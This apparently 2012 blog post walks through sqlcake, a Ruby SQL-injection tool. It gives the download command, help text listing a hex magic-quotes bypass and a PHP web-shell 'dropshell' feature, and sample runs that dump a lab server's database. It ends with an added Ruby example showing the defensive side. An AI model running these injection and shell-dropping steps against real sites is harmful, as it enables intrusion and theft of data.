sqlcake
Posted on 2012-11-21 00:16:21

Like SQLMAP, the official description is:

Automatic SQL injection and database information gathering tool.

Exactly the same description as SQLMAP.
It is written in Ruby.

    root@Dis9Team:/pen/sql# wget http://sourceforge.net/projects/sqlcake/files/sqlcake-v1.1.tar/download
    root@Dis9Team:/pen/sql# tar xf download.1

View the help:


    root@Dis9Team:/pen/sql# ruby sqlcake.rb


           _________________________________
          /                                 \
               sql auto exploitation kit
          \_________________________________/

                 version: v1.1b (beta)


    sqlcake _ sql auto exploitation kit _ v1.1b
    written by impuls <impuls23@safe-mail.net>

    automatic dump database & interactive sql shell tool
    dumps the current database structure including
    tables and columns and turns into an interactive
    mysql prompt. mysql specific special commands are:

    hex:[str]       => to hex a string for magic quotes bypassing, e.g. hex:hello
    dropshell:[str] => drops a php shell (param x) (magic quotes must be deactivated),
                    => e.g. dropshell:/var/www/exec.php | /exec.php?x=ps
    dump:[str]      => to dump a specific table, e.g. dump:mysql.users
    blind:[on/off]  => toggle blind sql injection mode

    parameter setup:

    -u => set target URI ["http://www.example.com/x.php?id=2&cat=5"]
    -p => set target parameter ["id"]
    -e => set error string for union selecion ["_fetch"]
    -d => set error escape string [" /*"]
    -b => use blind sql injection mode
    -f => write data to output file
    -x => skip database dump

    root@Dis9Team:/pen/sql#

FUZZ:


    root@Dis9Team:/pen/sql# ruby sqlcake.rb -u http://192.168.1.103/pen/news.php?id=1 -p id

It will automatically enumerate the columns and dump the database.



Save the data:


    root@Dis9Team:/pen/sql# ruby sqlcake.rb -u http://192.168.1.103/pen/news.php?id=1 -p id -f
    [*] Writing data to sqlcake_2012-11-11-101602.txt

blind sql
Parameter -b. Too slow. It emulates MySQL:

    root@Dis9Team:/pen/sql# ruby sqlcake.rb -u http://192.168.1.103/pen/news.php?id=1 -p id -x


           _________________________________
          /                                 \
               sql auto exploitation kit
          \_________________________________/

                 version: v1.1b (beta)


    [*] Getting column count...
    [*] Target URI: http://192.168.1.103/pen/news.php?id=1
    [*] Searching identifier...
    [*] Can't find identifier (_assoc)
    [*] Using blind SQL injection mode

    mysql>




One must play a thousand tunes before understanding music, and examine a thousand swords before knowing a blade.
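The help text above lists `hex:[str]` "for magic quotes bypassing". The Ruby sketch below is an added example, not part of the original post and not sqlcake code; it shows from the defender's side why quote escaping does not protect a numeric parameter such as `id`, next to a hardened handler. The function names, the `news` table columns and the sample inputs are assumptions constructed for illustration.

```ruby
# Added example: quote escaping vs. strict validation for a numeric parameter.
# All names and inputs here are hypothetical / constructed.

# Rough stand-in for PHP magic_quotes_gpc / addslashes:
# backslash-escape single quote, double quote, backslash and NUL.
def magic_quotes(value)
  value.gsub(/['"\\\x00]/) { |c| c == "\x00" ? "\\0" : "\\#{c}" }
end

# MySQL reads 0x68656c6c6f as the string 'hello', so a string value can be
# written without any quote character for the escaper to act on.
def mysql_hex_literal(str)
  "0x" + str.unpack1("H*")
end

# Weak pattern: escape, then concatenate into a numeric context.
def weak_query(id_param)
  "SELECT title, body FROM news WHERE id=#{magic_quotes(id_param)}"
end

# Hardened: accept only a short run of decimal digits, otherwise reject.
def parse_id(id_param)
  return nil unless id_param.is_a?(String) && id_param.match?(/\A[0-9]{1,10}\z/)
  id_param.to_i
end

# Hardened: validated integer passed as a bound value, never concatenated.
def hardened_query(id_param)
  id = parse_id(id_param)
  raise ArgumentError, "id must be a decimal integer" if id.nil?
  ["SELECT title, body FROM news WHERE id = ?", [id]]
end

# Constructed inputs: the same extra condition written with quotes and with hex.
QUOTED = "1 OR title='hello'"
HEXED  = "1 OR title=" + mysql_hex_literal("hello")

if __FILE__ == $PROGRAM_NAME
  puts weak_query(QUOTED)           # quotes are escaped, statement breaks
  puts weak_query(HEXED)            # passes through the escaper unchanged
  puts hardened_query("1").inspect  # placeholder plus integer bind value
  puts parse_id(HEXED).inspect      # nil: rejected before reaching SQL
end
```

The second line printed is the one that matters: the escaper has nothing to escape, so only type validation or bound parameters keep the input out of the statement text.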
